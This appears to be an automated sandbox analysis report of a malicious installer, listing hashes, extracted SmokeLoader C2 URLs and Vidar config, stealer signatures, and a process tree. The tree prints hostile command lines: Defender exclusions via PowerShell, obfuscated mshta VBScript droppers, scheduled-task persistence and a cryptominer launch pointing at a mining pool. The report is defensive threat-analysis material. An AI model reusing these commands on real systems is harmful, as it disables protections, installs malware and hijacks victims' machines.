Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Resubmissions
11-10-2021 20:45
211011-zjxjlsabbm 1011-10-2021 13:10
211011-qegsxshcfp 1011-10-2021 10:55
211011-mz7y3ahaak 1010-10-2021 19:24
211010-x4mtssgae2 10Analysis
-
max time kernel
59s -
max time network
1755s -
platform
windows7_x64 -
resource
win7-ja-20210920 -
submitted
10-10-2021 19:24
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210920
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-ja-20210920
General
-
Target
setup_x86_x64_install.exe
-
Size
3.9MB
-
MD5
a4d23ac3c7172b9aa02e35b6bf0fd21f
-
SHA1
0326aab7deddfefc048c9a67ac9ce4ee14ea9003
-
SHA256
9bd142ecfe89857de80bb3255a1655f680ca6451b45cca235096dc1c1285e806
-
SHA512
9e425d8a1beaeabfc983bb75a7a5f8a8c0823e825e9f66e17b0f515b2897da9f2d9b2f1aa9939fdbae6c826c2c730d3bc772abec9e35a61d3d73a6cdb87ddf10
Malware Config
Extracted
smokeloader
2020
http://gmpeople.com/upload/
http://mile48.com/upload/
http://lecanardstsornin.com/upload/
http://m3600.com/upload/
http://camasirx.com/upload/
Extracted
vidar
41.2
933
https://mas.to/@serg4325
-
profile_id
933
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1696 2664 rUNdlL32.eXe 73 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 1 IoCs
resource yara_rule behavioral1/memory/1600-212-0x0000000003250000-0x000000000326F000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 3 IoCs
resource yara_rule behavioral1/files/0x00050000000131ea-119.dat family_socelars behavioral1/files/0x00050000000131ea-137.dat family_socelars behavioral1/files/0x00050000000131ea-104.dat family_socelars -
Vidar Stealer 2 IoCs
resource yara_rule behavioral1/memory/2332-305-0x0000000000400000-0x00000000004D9000-memory.dmp family_vidar behavioral1/memory/2332-302-0x0000000000A20000-0x0000000000AF6000-memory.dmp family_vidar -
resource yara_rule behavioral1/files/0x000500000001267c-70.dat aspack_v212_v242 behavioral1/files/0x000500000001267c-71.dat aspack_v212_v242 behavioral1/files/0x0006000000012634-72.dat aspack_v212_v242 behavioral1/files/0x0006000000012634-73.dat aspack_v212_v242 behavioral1/files/0x00050000000126a2-76.dat aspack_v212_v242 behavioral1/files/0x00050000000126a2-77.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 12 IoCs
pid Process 1788 setup_installer.exe 396 setup_install.exe 960 Sun152bab5a2de.exe 920 Sun15dbd675f871ca.exe 1392 Sun15901f2f025e.exe 1736 Sun1577c3e159a3e3815.exe 288 Sun15f67075f27a2b5b.exe 1600 Sun15f1b1f8c669.exe 1332 Sun1507db358fce61c0b.exe 936 Sun152bea652bd7232.exe 1608 Sun152e52d07b74d9b5.exe 1864 Sun158d8ef840.exe -
Loads dropped DLL 36 IoCs
pid Process 1148 setup_x86_x64_install.exe 1788 setup_installer.exe 1788 setup_installer.exe 1788 setup_installer.exe 1788 setup_installer.exe 1788 setup_installer.exe 1788 setup_installer.exe 396 setup_install.exe 396 setup_install.exe 396 setup_install.exe 396 setup_install.exe 396 setup_install.exe 396 setup_install.exe 396 setup_install.exe 396 setup_install.exe 1580 cmd.exe 1656 cmd.exe 1320 5203333.scr 2028 cmd.exe 2028 cmd.exe 1240 cmd.exe 1116 cmd.exe 1116 cmd.exe 1600 Sun15f1b1f8c669.exe 1600 Sun15f1b1f8c669.exe 1728 cmd.exe 632 cmd.exe 632 cmd.exe 2004 cmd.exe 980 cmd.exe 1332 Sun1507db358fce61c0b.exe 1332 Sun1507db358fce61c0b.exe 1864 Sun158d8ef840.exe 1864 Sun158d8ef840.exe 1392 Sun15901f2f025e.exe 1392 Sun15901f2f025e.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/memory/2360-215-0x0000000000B80000-0x0000000000B81000-memory.dmp themida -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
pid pid_target Process procid_target 2256 2332 WerFault.exe 86 3104 1320 WerFault.exe 107 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun1507db358fce61c0b.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun1507db358fce61c0b.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun1507db358fce61c0b.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2336 schtasks.exe 3076 schtasks.exe -
Kills process with taskkill 4 IoCs
pid Process 2180 taskkill.exe 3020 taskkill.exe 3740 taskkill.exe 1428 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 15 IoCs
pid Process 1332 Sun1507db358fce61c0b.exe 1332 Sun1507db358fce61c0b.exe 1364 Process not Found 1364 Process not Found 1364 Process not Found 1364 Process not Found 1364 Process not Found 1364 Process not Found 1364 Process not Found 1364 Process not Found 1364 Process not Found 1364 Process not Found 1364 Process not Found 1364 Process not Found 1364 Process not Found -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1332 Sun1507db358fce61c0b.exe -
Suspicious use of AdjustPrivilegeToken 36 IoCs
description pid Process Token: SeCreateTokenPrivilege 1392 Sun15901f2f025e.exe Token: SeAssignPrimaryTokenPrivilege 1392 Sun15901f2f025e.exe Token: SeLockMemoryPrivilege 1392 Sun15901f2f025e.exe Token: SeIncreaseQuotaPrivilege 1392 Sun15901f2f025e.exe Token: SeMachineAccountPrivilege 1392 Sun15901f2f025e.exe Token: SeTcbPrivilege 1392 Sun15901f2f025e.exe Token: SeSecurityPrivilege 1392 Sun15901f2f025e.exe Token: SeTakeOwnershipPrivilege 1392 Sun15901f2f025e.exe Token: SeLoadDriverPrivilege 1392 Sun15901f2f025e.exe Token: SeSystemProfilePrivilege 1392 Sun15901f2f025e.exe Token: SeSystemtimePrivilege 1392 Sun15901f2f025e.exe Token: SeProfSingleProcessPrivilege 1392 Sun15901f2f025e.exe Token: SeIncBasePriorityPrivilege 1392 Sun15901f2f025e.exe Token: SeCreatePagefilePrivilege 1392 Sun15901f2f025e.exe Token: SeCreatePermanentPrivilege 1392 Sun15901f2f025e.exe Token: SeBackupPrivilege 1392 Sun15901f2f025e.exe Token: SeRestorePrivilege 1392 Sun15901f2f025e.exe Token: SeShutdownPrivilege 1392 Sun15901f2f025e.exe Token: SeDebugPrivilege 1392 Sun15901f2f025e.exe Token: SeAuditPrivilege 1392 Sun15901f2f025e.exe Token: SeSystemEnvironmentPrivilege 1392 Sun15901f2f025e.exe Token: SeChangeNotifyPrivilege 1392 Sun15901f2f025e.exe Token: SeRemoteShutdownPrivilege 1392 Sun15901f2f025e.exe Token: SeUndockPrivilege 1392 Sun15901f2f025e.exe Token: SeSyncAgentPrivilege 1392 Sun15901f2f025e.exe Token: SeEnableDelegationPrivilege 1392 Sun15901f2f025e.exe Token: SeManageVolumePrivilege 1392 Sun15901f2f025e.exe Token: SeImpersonatePrivilege 1392 Sun15901f2f025e.exe Token: SeCreateGlobalPrivilege 1392 Sun15901f2f025e.exe Token: 31 1392 Sun15901f2f025e.exe Token: 32 1392 Sun15901f2f025e.exe Token: 33 1392 Sun15901f2f025e.exe Token: 34 1392 Sun15901f2f025e.exe Token: 35 1392 Sun15901f2f025e.exe Token: SeDebugPrivilege 288 Sun15f67075f27a2b5b.exe Token: SeDebugPrivilege 1608 Sun152e52d07b74d9b5.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1148 wrote to memory of 1788 1148 setup_x86_x64_install.exe 28 PID 1148 wrote to memory of 1788 1148 setup_x86_x64_install.exe 28 PID 1148 wrote to memory of 1788 1148 setup_x86_x64_install.exe 28 PID 1148 wrote to memory of 1788 1148 setup_x86_x64_install.exe 28 PID 1148 wrote to memory of 1788 1148 setup_x86_x64_install.exe 28 PID 1148 wrote to memory of 1788 1148 setup_x86_x64_install.exe 28 PID 1148 wrote to memory of 1788 1148 setup_x86_x64_install.exe 28 PID 1788 wrote to memory of 396 1788 setup_installer.exe 29 PID 1788 wrote to memory of 396 1788 setup_installer.exe 29 PID 1788 wrote to memory of 396 1788 setup_installer.exe 29 PID 1788 wrote to memory of 396 1788 setup_installer.exe 29 PID 1788 wrote to memory of 396 1788 setup_installer.exe 29 PID 1788 wrote to memory of 396 1788 setup_installer.exe 29 PID 1788 wrote to memory of 396 1788 setup_installer.exe 29 PID 396 wrote to memory of 764 396 setup_install.exe 33 PID 396 wrote to memory of 764 396 setup_install.exe 33 PID 396 wrote to memory of 764 396 setup_install.exe 33 PID 396 wrote to memory of 764 396 setup_install.exe 33 PID 396 wrote to memory of 764 396 setup_install.exe 33 PID 396 wrote to memory of 764 396 setup_install.exe 33 PID 396 wrote to memory of 764 396 setup_install.exe 33 PID 396 wrote to memory of 1580 396 setup_install.exe 34 PID 396 wrote to memory of 1580 396 setup_install.exe 34 PID 396 wrote to memory of 1580 396 setup_install.exe 34 PID 396 wrote to memory of 1580 396 setup_install.exe 34 PID 396 wrote to memory of 1580 396 setup_install.exe 34 PID 396 wrote to memory of 1580 396 setup_install.exe 34 PID 396 wrote to memory of 1580 396 setup_install.exe 34 PID 396 wrote to memory of 1320 396 setup_install.exe 35 PID 396 wrote to memory of 1320 396 setup_install.exe 35 PID 396 wrote to memory of 1320 396 setup_install.exe 35 PID 396 wrote to memory of 1320 396 setup_install.exe 35 PID 396 wrote to memory of 1320 396 setup_install.exe 35 PID 396 wrote to memory of 1320 396 setup_install.exe 35 PID 396 wrote to memory of 1320 396 setup_install.exe 35 PID 396 wrote to memory of 1656 396 setup_install.exe 36 PID 396 wrote to memory of 1656 396 setup_install.exe 36 PID 396 wrote to memory of 1656 396 setup_install.exe 36 PID 396 wrote to memory of 1656 396 setup_install.exe 36 PID 396 wrote to memory of 1656 396 setup_install.exe 36 PID 396 wrote to memory of 1656 396 setup_install.exe 36 PID 396 wrote to memory of 1656 396 setup_install.exe 36 PID 396 wrote to memory of 1240 396 setup_install.exe 57 PID 396 wrote to memory of 1240 396 setup_install.exe 57 PID 396 wrote to memory of 1240 396 setup_install.exe 57 PID 396 wrote to memory of 1240 396 setup_install.exe 57 PID 396 wrote to memory of 1240 396 setup_install.exe 57 PID 396 wrote to memory of 1240 396 setup_install.exe 57 PID 396 wrote to memory of 1240 396 setup_install.exe 57 PID 1580 wrote to memory of 960 1580 cmd.exe 56 PID 1580 wrote to memory of 960 1580 cmd.exe 56 PID 1580 wrote to memory of 960 1580 cmd.exe 56 PID 1580 wrote to memory of 960 1580 cmd.exe 56 PID 1580 wrote to memory of 960 1580 cmd.exe 56 PID 1580 wrote to memory of 960 1580 cmd.exe 56 PID 1580 wrote to memory of 960 1580 cmd.exe 56 PID 764 wrote to memory of 588 764 cmd.exe 37 PID 764 wrote to memory of 588 764 cmd.exe 37 PID 764 wrote to memory of 588 764 cmd.exe 37 PID 764 wrote to memory of 588 764 cmd.exe 37 PID 764 wrote to memory of 588 764 cmd.exe 37 PID 764 wrote to memory of 588 764 cmd.exe 37 PID 764 wrote to memory of 588 764 cmd.exe 37 PID 396 wrote to memory of 2028 396 setup_install.exe 38
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1148 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1788 -
C:\Users\Admin\AppData\Local\Temp\7zSCF628646\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSCF628646\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:396 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:764 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵PID:588
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun152bab5a2de.exe4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1580 -
C:\Users\Admin\AppData\Local\Temp\7zSCF628646\Sun152bab5a2de.exeSun152bab5a2de.exe5⤵
- Executes dropped EXE
PID:960
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun15901f2f025e.exe4⤵PID:1320
-
C:\Users\Admin\AppData\Local\Temp\7zSCF628646\Sun15901f2f025e.exeSun15901f2f025e.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1392 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:2952
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:3020
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun15dbd675f871ca.exe4⤵
- Loads dropped DLL
PID:1656 -
C:\Users\Admin\AppData\Local\Temp\7zSCF628646\Sun15dbd675f871ca.exeSun15dbd675f871ca.exe5⤵
- Executes dropped EXE
PID:920
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1577c3e159a3e3815.exe /mixone4⤵
- Loads dropped DLL
PID:2028 -
C:\Users\Admin\AppData\Local\Temp\7zSCF628646\Sun1577c3e159a3e3815.exeSun1577c3e159a3e3815.exe /mixone5⤵
- Executes dropped EXE
PID:1736
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1507db358fce61c0b.exe4⤵
- Loads dropped DLL
PID:632 -
C:\Users\Admin\AppData\Local\Temp\7zSCF628646\Sun1507db358fce61c0b.exeSun1507db358fce61c0b.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1332
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun158d8ef840.exe4⤵
- Loads dropped DLL
PID:2004 -
C:\Users\Admin\AppData\Local\Temp\7zSCF628646\Sun158d8ef840.exeSun158d8ef840.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1864 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zSCF628646\Sun158d8ef840.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zSCF628646\Sun158d8ef840.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )6⤵PID:1348
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zSCF628646\Sun158d8ef840.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zSCF628646\Sun158d8ef840.exe") do taskkill /F -Im "%~NxU"7⤵PID:2108
-
C:\Users\Admin\AppData\Local\Temp\09xU.exE09xU.EXE -pPtzyIkqLZoCarb5ew8⤵PID:2168
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )9⤵PID:2244
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"10⤵PID:2556
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " ,0,TRuE) )9⤵PID:2788
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F -Im "Sun158d8ef840.exe"8⤵
- Kills process with taskkill
PID:2180
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun152e52d07b74d9b5.exe4⤵
- Loads dropped DLL
PID:980 -
C:\Users\Admin\AppData\Local\Temp\7zSCF628646\Sun152e52d07b74d9b5.exeSun152e52d07b74d9b5.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1608 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵PID:2212
-
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"7⤵PID:2092
-
C:\Users\Admin\AppData\Roaming\4713260.scr"C:\Users\Admin\AppData\Roaming\4713260.scr" /S8⤵PID:1276
-
-
C:\Users\Admin\AppData\Roaming\4003977.scr"C:\Users\Admin\AppData\Roaming\4003977.scr" /S8⤵PID:2108
-
-
C:\Users\Admin\AppData\Roaming\4184945.scr"C:\Users\Admin\AppData\Roaming\4184945.scr" /S8⤵PID:2236
-
-
C:\Users\Admin\AppData\Roaming\5203333.scr"C:\Users\Admin\AppData\Roaming\5203333.scr" /S8⤵
- Loads dropped DLL
PID:1320 -
C:\Users\Admin\AppData\Local\Temp\894a4b58-4885-4d9f-9643-29987a78a60b\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\894a4b58-4885-4d9f-9643-29987a78a60b\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\894a4b58-4885-4d9f-9643-29987a78a60b\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run9⤵PID:684
-
C:\Users\Admin\AppData\Local\Temp\894a4b58-4885-4d9f-9643-29987a78a60b\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\894a4b58-4885-4d9f-9643-29987a78a60b\AdvancedRun.exe" /SpecialRun 4101d8 68410⤵PID:2156
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\5203333.scr" -Force9⤵PID:872
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1320 -s 18369⤵
- Program crash
PID:3104
-
-
C:\Users\Admin\AppData\Roaming\5203333.scr"C:\Users\Admin\AppData\Roaming\5203333.scr"9⤵PID:2120
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\5203333.scr" -Force9⤵PID:2816
-
-
-
C:\Users\Admin\AppData\Roaming\2932572.scr"C:\Users\Admin\AppData\Roaming\2932572.scr" /S8⤵PID:1688
-
-
-
C:\Users\Admin\AppData\Local\Temp\Soft1ww01.exe"C:\Users\Admin\AppData\Local\Temp\Soft1ww01.exe"7⤵PID:2332
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2332 -s 9168⤵
- Program crash
PID:2256
-
-
-
C:\Users\Admin\AppData\Local\Temp\sad.exe"C:\Users\Admin\AppData\Local\Temp\sad.exe"7⤵PID:2392
-
-
C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"7⤵PID:2552
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ("WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF """" =="""" for %z iN (""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ))8⤵PID:2588
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "" =="" for %z iN ("C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe") do taskkill -f /Im "%~nXz"9⤵PID:2700
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f /Im "sfx_123_206.exe"10⤵
- Kills process with taskkill
PID:1428
-
-
C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u10⤵PID:964
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵PID:2604
-
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"7⤵PID:1100
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵PID:2740
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "setup_2.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" & exit8⤵PID:3676
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "setup_2.exe" /f9⤵
- Kills process with taskkill
PID:3740
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵PID:2916
-
-
C:\Users\Admin\AppData\Local\Temp\zyl-game.exe"C:\Users\Admin\AppData\Local\Temp\zyl-game.exe"7⤵PID:2240
-
-
C:\Users\Admin\AppData\Local\Temp\3.exe"C:\Users\Admin\AppData\Local\Temp\3.exe"7⤵PID:2932
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵PID:3656
-
-
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵PID:2148
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵PID:2060
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
PID:2336
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵PID:2880
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵PID:3008
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
PID:3076
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵PID:2400
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵PID:3988
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun152bea652bd7232.exe4⤵
- Loads dropped DLL
PID:1728
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun159ff1acacf.exe4⤵PID:1144
-
C:\Users\Admin\AppData\Local\Temp\7zSCF628646\Sun159ff1acacf.exeSun159ff1acacf.exe5⤵PID:2688
-
C:\Users\Admin\AppData\Local\Temp\7zSCF628646\Sun159ff1acacf.exeC:\Users\Admin\AppData\Local\Temp\7zSCF628646\Sun159ff1acacf.exe6⤵PID:2908
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun15f1b1f8c669.exe4⤵
- Loads dropped DLL
PID:1116
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun15f67075f27a2b5b.exe4⤵
- Loads dropped DLL
PID:1240
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zSCF628646\Sun152bea652bd7232.exeSun152bea652bd7232.exe1⤵
- Executes dropped EXE
PID:936
-
C:\Users\Admin\AppData\Local\Temp\7zSCF628646\Sun15f1b1f8c669.exeSun15f1b1f8c669.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1600
-
C:\Users\Admin\AppData\Local\Temp\7zSCF628646\Sun15f67075f27a2b5b.exeSun15f67075f27a2b5b.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:288 -
C:\Users\Admin\AppData\Roaming\4514757.scr"C:\Users\Admin\AppData\Roaming\4514757.scr" /S2⤵PID:2196
-
-
C:\Users\Admin\AppData\Roaming\1312553.scr"C:\Users\Admin\AppData\Roaming\1312553.scr" /S2⤵PID:2272
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"3⤵PID:2660
-
-
-
C:\Users\Admin\AppData\Roaming\6257203.scr"C:\Users\Admin\AppData\Roaming\6257203.scr" /S2⤵PID:2360
-
-
C:\Users\Admin\AppData\Roaming\1806569.scr"C:\Users\Admin\AppData\Roaming\1806569.scr" /S2⤵PID:2424
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I1⤵PID:2892
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHO "2⤵PID:2924
-
-
C:\Windows\SysWOW64\control.execontrol .\R6f7sE.I2⤵PID:2984
-
